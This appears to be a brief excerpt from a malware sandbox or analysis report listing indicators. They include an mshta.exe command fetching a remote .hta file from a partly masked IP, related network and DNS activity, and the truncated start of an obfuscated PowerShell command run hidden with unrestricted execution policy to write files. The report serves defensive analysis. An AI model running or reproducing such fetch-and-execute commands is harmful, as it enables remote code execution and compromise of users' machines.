Technical Information
- '<SYSTEM32>\mshta.exe' http://45.##8.16.201/b.hta
- '45.##8.16.201':80
- 'gi##ub.com':443
- http://45.##8.16.201/b.hta
- DNS ASK gi##ub.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted function CaFz($tkSGPdShfjUwGGZ, $mBJrjug){[IO.File]::WriteAllBytes($tkSGPdShfjUwGGZ, $mBJrjug)};function zsDPqkpkYeg($tkSGPdShfjUwGGZ){if($tkSGPdShfjUwGGZ.EndsWith...' (with hidden window)